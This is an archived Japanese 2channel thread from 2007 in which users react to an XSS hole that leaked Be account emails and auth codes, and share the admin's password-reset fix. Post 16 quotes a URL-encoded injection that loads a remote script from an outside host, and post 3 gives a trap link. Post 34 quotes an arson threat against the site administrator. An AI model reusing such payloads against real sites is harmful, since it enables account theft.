2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

2chにBeのメアドと認証コードが漏れるXSS脆弱性が発見されたらしい

1 :名無しさん@お腹いっぱい。:2007/11/27(火) 23:43:23 ID:/AoMGOX5 ?PLT(20385)
詳しくは乳速で

【速報】 俺、2chにBeのメアドと認証コードが漏れるXSS脆弱性を発見
http://news23.2ch.net/test/read.cgi/news/1196173345/

2 :名無しさん@お腹いっぱい。:2007/11/27(火) 23:47:09 ID:Tldueh9I ?2BP(5600)
それを承知で俺をPLTにして下さい><

命がけでクソスレを立てます!

3 :名無しさん@お腹いっぱい。:2007/11/28(水) 00:01:59 ID:ZaHA5XaI ?PLT(13210)
IEユーザーはクッキーを削除して、落ち着くまではログインしない方がいいかもね
****http://z.la/ms0k2
↑これを踏むとやばいです

4 :名無しさん@お腹いっぱい。:2007/11/28(水) 00:08:13 ID:6XTNUK4s ?2BP(8200)
          _,,,,,         ―― |_| |_| >
         /川川ハ        | l ̄ | |    ノ   メ
        ///川川lト、      |_| 匚. |   \   シ
       (ゞ川从川/_,―' ̄ヽ    | |   ノ    食
     __>ームヾ ̄(  _-、 |  |_|   \   っ
    /   |       y-  ノ_|       <   て
    '-,,_ |        |  ムkノ) l_ll_l ,-,    )  る
       "|        |       // /   場
        |         |     匚/   ̄ヽ   合
       |     ___ |              ノ   じ
       r―――"    ‐|  \\     \   ゃ
       |          /     \\   <   ね
       人     乂  /       \\ ノ   え
ニヽ   /  |    ヾ /    ___―― ̄    っ
__\ /  /|     l         ̄ ̄―――__  !
     / /  \\  ヾ                 ν、
 ̄弋二/ ̄|   \\  \   \\            V⌒
 ̄ ̄\\\ ̄\  \\  \    \\
 ̄ ̄ ̄\\\ ̄|   "―_从从     \\
 ̄ ̄ ̄ ̄\\\ ̄\    |   ζ      \\
 ̄ ̄ ̄ ̄ ̄\\\ ̄|    ヾ  \\       \\
 ̄ ̄ ̄ ̄ ̄ ̄\\\\ ̄フ \\ \\


5 :ギコ猫( ゚Д゚)さん ◆U26057WR46 :2007/11/28(水) 00:11:19 ID:r7t6J8nn ?2BP(3377)
危険なのでNGワードに放り込んでおいたよ

6 :名無しさん@お腹いっぱい。:2007/11/28(水) 00:43:55 ID:wQgwZpag ?2BP(6377)
ひどいね、これは

7 :∬^〜^∬ID:He+n/v090 ◆PITBox8Pc2 :2007/11/28(水) 00:47:47 ID:Wf9euZYA ?2BP(6164)
怖いよう;;;

8 :名無しさん@お腹いっぱい。:2007/11/28(水) 00:49:39 ID:tMcjNwKb ?PLT(18181)
踏んでしまったwww
あばばばば^q^

9 :名無しさん@お腹いっぱい。:2007/11/28(水) 00:50:10 ID:gTPt/Y4Z
>>3
直リンこわいです。><

10 :名無しさん@お腹いっぱい。:2007/11/28(水) 00:50:55 ID:NGw2eJ/N ?S★(1052173)
怖い

11 :名無しさん@お腹いっぱい。:2007/11/28(水) 01:02:00 ID:tMcjNwKb ?PLT(18181)
やべwwwwww焼かれたwww
吊ってくる

12 :名無しさん@お腹いっぱい。:2007/11/28(水) 01:02:40 ID:aRUu4aBs ?PLT(71072)
やかれたorz
吊ってくる

13 :名無しさん@お腹いっぱい。:2007/11/28(水) 01:06:13 ID:O8uuQnZF ?PLT(20385)
【news】ニュース速報運用情報42【ν】
http://qb5.2ch.net/test/read.cgi/operate/1196072109/135

対応された模様。

14 :名無しさん@お腹いっぱい。:2007/11/28(水) 01:12:24 ID:O8uuQnZF ?PLT(20385)
【速報】 俺、2chにBeのメアドと認証コードが漏れるXSS脆弱性を発見 その2★
http://news23.2ch.net/test/read.cgi/news/1196179103/218

と思ったら、新しいのが。

15 :名無しさん@お腹いっぱい。:2007/11/28(水) 01:19:02 ID:PP17toUr ?2BP(100)
どれどれ

16 :名無しさん@お腹いっぱい。:2007/11/28(水) 01:19:46 ID:jy6iGHMv ?2BP(3471)
●ニュース速報
【速報】 俺、2chにBeのメアドと認証コードが漏れるXSS脆弱性を発見 その2★
http://news23.2ch.net/test/read.cgi/news/1196179103/
【速報】 俺、2chにBeのメアドと認証コードが漏れるXSS脆弱性を発見
http://news23.2ch.net/test/read.cgi/news/1196173345/

●ニュース速報(VIP)
Be鯖バグ踏んだ奴ちょっとこい、修正されんぞ
http://yutori.2ch.net/test/read.cgi/news4vip/1196179999/

●2ch運用情報
【速報】Beのメアドと認証コードが漏れるXSS脆弱性を発見
http://qb5.2ch.net/test/read.cgi/operate/1196177188/

【速報】 俺、2chにBeのメアドと認証コードが漏れるXSS脆弱性を発見 その2★
http://news23.2ch.net/test/read.cgi/news/1196179103/218
218 : 40歳無職(三重県):2007/11/28(水) 01:09:11 ID:uuFnxPaY0

対策されてしまった。
と言う訳で第二弾。

http://z.la/t4b0m (短縮URL)
http://qb6.2ch.net/_boo80/boo80.swx?boo80=%3Cscript%20src%3D%22http%3A%2F%2Fmoyashi%2Esosite%2Ejp%2Fxss%2Fload%2Ejs%22%3E%3C%2Fscript%3E

鱈子は修正頑張ってください。

17 :名無しさん@お腹いっぱい。:2007/11/28(水) 01:25:04 ID:gTPt/Y4Z
>>16
専ブラにポップアップ付いてるので、
直リンこわいです。><

18 :名無しさん@お腹いっぱい。:2007/11/28(水) 01:30:03 ID:kT7Iq0Ei ?2BP(259)
皆さんのおかげで やっと少し増えたところなのに
焼かれちゃったりしたら、人間不信になるかもでつ。

当分はどのURLも踏まないようにしたいと思います。
嫌な世の中でつね。

19 :名無しさん@お腹いっぱい。:2007/11/28(水) 01:34:11 ID:T4LMZ28e ?DIA(171000)
怖い

20 : ◆Nullpo/BU. :2007/11/28(水) 01:47:24 ID:NPfWeA+o ?PLT(34443) 株優プチ(be)
こえぇぇぇ

21 :名無しさん@お腹いっぱい。:2007/11/28(水) 02:15:28 ID:4cJM7E/7 ?2BP(2919)
これは法的には問題ないのだろうが、よく考えたねえ。

22 :名無しさん@お腹いっぱい。:2007/11/28(水) 02:18:16 ID:kmqrbrwo ?BRZ(10056)
ふんじゃった

23 :名無しさん@お腹いっぱい。:2007/11/28(水) 02:20:59 ID:kT7Iq0Ei ?2BP(0)
全く別のパソにテケトーなフリメ取って登録してみた
こっちで踏んだらおけ?

24 :オッサン ◆1.Fuck.nn. :2007/11/28(水) 02:57:43 ID:mKUazTph
★複数板BEのメアドと認証コードが漏れるURLを張る人報告スレ
http://qb5.2ch.net/test/read.cgi/sec2chd/1196184490/

25 :名無しさん@お腹いっぱい。:2007/11/28(水) 04:38:23 ID:jy6iGHMv ?2BP(3471)
>>17
ごめん専ブラ利用者のことまで頭が回らなかった。申し訳ない。
ちなみに、ニュー速で晒されたURIについては
URI文字列で書き込み禁止措置が取られた模様。

●ニュース速報
【速報】 俺、2chにBeのメアドと認証コードが漏れるXSS脆弱性を発見 その3★
http://news23.2ch.net/test/read.cgi/news/1196182094/

26 :名無しさん@お腹いっぱい。:2007/11/28(水) 04:59:14 ID:jy6iGHMv ?2BP(3471)
●運用情報
Be-2ちゃんねる 人柱募集中。。。Part6
http://qb5.2ch.net/test/read.cgi/operate/1188056382/
http://qb5.2ch.net/test/read.cgi/operate/1188056382/57
#57 : [―{}@{}@{}-] たまご ◆EGGMAN.XJI :2007/09/03(月) 00:25:11 ID:UHhgNS9A0 ?S★(577791)
#クッキー使ってbeの認証コードとメアド盗めるよー(^o^)ノ
#株の操作し放題だろうがたぶんつまらんからやめとく

【news】ニュース速報運用情報42【ν】
http://qb5.2ch.net/test/read.cgi/operate/1196072109/
http://qb5.2ch.net/test/read.cgi/operate/1196072109/441
#441 :動け動けウゴウゴ2ちゃんねる:2007/11/28(水) 02:37:17 ID:8igj5YIL0
#そうなんだよね。俺が一昨日ぐらいに見つけて、たまごに言ったら
#それ夏頃にkusaiと自分が見つけたと言われて、XSSが発生する場所も一致した。
#んで黙ってるのはつまらないと思ったので全壊に頼んで立てて貰ったという訳。

http://qb5.2ch.net/test/read.cgi/operate/1196072109/446
#446 :動け動けウゴウゴ2ちゃんねる:2007/11/28(水) 02:40:39 ID:8igj5YIL0
#>>443
#ニュー速の方にも書いたけど
#タラコと何回かメールでやり取りしたよ
#ただ向こうが聞く耳を持たなかった それだけ

2chの動作報告はここで。 パート22
http://qb5.2ch.net/test/read.cgi/operate/1182679645/
http://qb5.2ch.net/test/read.cgi/operate/1182679645/529-590

27 :名無しさん@お腹いっぱい。:2007/11/28(水) 05:10:31 ID:ywxetRSt ?PLT(21322)
507 ひろゆき@どうやら管理人 ★ 2007/11/28(水) 04:37:34 ID:???0 BE:227366-S★(1012558)
http://be.2ch.net/test/editprof.php
パスワードを変えられるようにしましたー。

511 ひろゆき@どうやら管理人 ★ 2007/11/28(水) 04:39:30 ID:???0 BE:227849-S★(1012558)
passが変わると認証コードも変わりますよ。。と。


【news】ニュース速報運用情報42【ν】
http://qb5.2ch.net/test/read.cgi/operate/1196072109/

28 :名無しさん@お腹いっぱい。:2007/11/28(水) 05:35:06 ID:TX00CzgI ?2BP(1747)
焼かれた

29 :名無しさん@お腹いっぱい。:2007/11/28(水) 05:39:54 ID:IMSQGU8q ?2BP(7890)
認証コードはどこで?

30 :名無しさん@お腹いっぱい。:2007/11/28(水) 07:04:22 ID:tMcjNwKb ?PLT(18282)
焼かれてなかったwww

31 :名無しさん@お腹いっぱい。:2007/11/28(水) 10:45:49 ID:8IkmAWXO ?PLT(71072)
焼かれてなかった
よかったよかった

32 :名無しさん@お腹いっぱい。:2007/11/28(水) 12:17:43 ID:jy6iGHMv ?2BP(3471)
●ニュース速報
beのパスワードと認証コードが変えられるようになりました
http://news23.2ch.net/test/read.cgi/news/1196192699/

33 :名無しさん@お腹いっぱい。:2007/11/28(水) 13:10:00 ID:dPzoqWYU ?DIA(110721)
罠URL踏んでメアドと認証コード漏れる→VIPで使われてあっという間に0ポイントに
怖いですね

34 :名無しさん@お腹いっぱい。:2007/11/28(水) 13:40:19 ID:jy6iGHMv ?2BP(3471)
>>21
いいえ、不正アクセスで真っ黒くなるんじゃないでしょうか?
サイバーノーガード戦法。

【news】ニュース速報運用情報42【ν】
http://qb5.2ch.net/test/read.cgi/operate/1196072109/
http://qb5.2ch.net/test/read.cgi/operate/1196072109/874
#874 :フェンリル:2007/11/28(水) 12:06:06 ID:KySiAldO0
#マジでひろゆき28万ポイント返しやがれ糞が
#訴えるぞガチで。
#つうか俺のbeにログインしてスレ立てした奴も本気で訴えるわ
#てめーがニュー速に糞スレ立てたせーでsakuられただろーが屑


#2ch閉鎖の危機に追い込むぞ、もしくは管理人の家に火付けにいくわ

#それが嫌なら今週中にポイント戻せよ。

http://qb5.2ch.net/test/read.cgi/operate/1196072109/876
#876 :ひろゆき@どうやら管理人 ★:2007/11/28(水) 12:15:55 ID:???0 ?S★(1013000)
#>つうか俺のbeにログインしてスレ立てした奴も本気で訴えるわ
#訴訟の結果、本人じゃないというのがわかったら、
#戻しますよ。

35 :名無しさん@お腹いっぱい。:2007/11/28(水) 13:42:01 ID:ElFEw5uP ?2BP(1513)
ここには書き込める、ニュー速にもテスト書き込みできた、
でも常駐板では「焼かれたBeでは書き込めません」・・・

そろそろ次スレ立てなきゃならんのにorz

36 :名無しさん@お腹いっぱい。:2007/11/28(水) 13:46:01 ID:jy6iGHMv ?2BP(3471)
>>34
ちん毛にモヤシ混ざってた
http://news23.2ch.net/test/read.cgi/news/1196205336/
1 : ミトコンドリア(北海道):2007/11/28(水) 08:15:36 ID:hK3VnU3r0 ?DIA(298854) ポイント特典

ちんちん シュッ! シュッ! シュッ!
http://news23.2ch.net/test/read.cgi/news/1196206144/
1 : 女性の全代表(北海道):2007/11/28(水) 08:29:04 ID:qxCULkeS0 ?DIA(298704) ポイント特典

↓ ↓ ↓ ↓

http://be.2ch.net/test/p.php?i=543898837
http://be.2ch.net/test/p.php?i=1087796467
フェンリル◆be/xFEN/R. ★
beポイント:1
登録日:2007-07-02

37 :名無しさん@お腹いっぱい。:2007/11/28(水) 14:09:38 ID:jy6iGHMv ?2BP(3471)
【news】ニュース速報運用情報42【ν】
http://qb5.2ch.net/test/read.cgi/operate/1196072109/826
826 :動け動けウゴウゴ2ちゃんねる:2007/11/28(水) 09:12:15 ID:64fnJpBb0
手順は
1
> http://be.2ch.net/test/editprof.php
> まず、パスワードを変更してください。

2
> んで、再ログイン

・Webブラウザはこれで完了

3
宣撫らに使う新認証コードはWebブラウザのクッキーを見るか
http://be.2ch.net/test/regist.html
でメアド+新パス入力して送ってもらう

でおkかな?


38 :名無しさん@お腹いっぱい。:2007/11/28(水) 16:33:15 ID:vp5YSCkx ?DIA(210000)
なにこれーほんとかどうだか試しちゃう?

39 :名無しさん@お腹いっぱい。:2007/11/28(水) 17:23:58 ID:tMcjNwKb ?PLT(18422)
やめとけwww

40 :名無しさん@お腹いっぱい。:2007/11/28(水) 17:48:18 ID:04BeT9XF ?PLT(31001)
焼かれたってのは判別の仕方わからないなぁ
親切心につけこむ感じで嫌なやり方だったね

41 :名無しさん@お腹いっぱい。:2007/11/29(木) 04:50:28 ID:hwz0QRVt ?2BP(3471)
●運用情報
【速報】Beのメアドと認証コードが漏れるXSS脆弱性を発見
http://qb5.2ch.net/test/read.cgi/operate/1196177188/
【news】ニュース速報運用情報43【ν】
http://qb5.2ch.net/test/read.cgi/operate/1196240580/
【news】ニュース速報運用情報42【ν】
http://qb5.2ch.net/test/read.cgi/operate/1196072109/

●セキュリティ
[バグ 仕様]2chの脆弱性について語る[2ちゃんねる]
http://pc11.2ch.net/test/read.cgi/sec/1173113358/

42 :名無しさん@お腹いっぱい。:2007/11/29(木) 14:04:40 ID:hwz0QRVt ?2BP(3535)
●ニュース速報
beのパスワードと認証コードが変えられるようになりました 2
http://news23.2ch.net/test/read.cgi/news/1196238999/

14 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)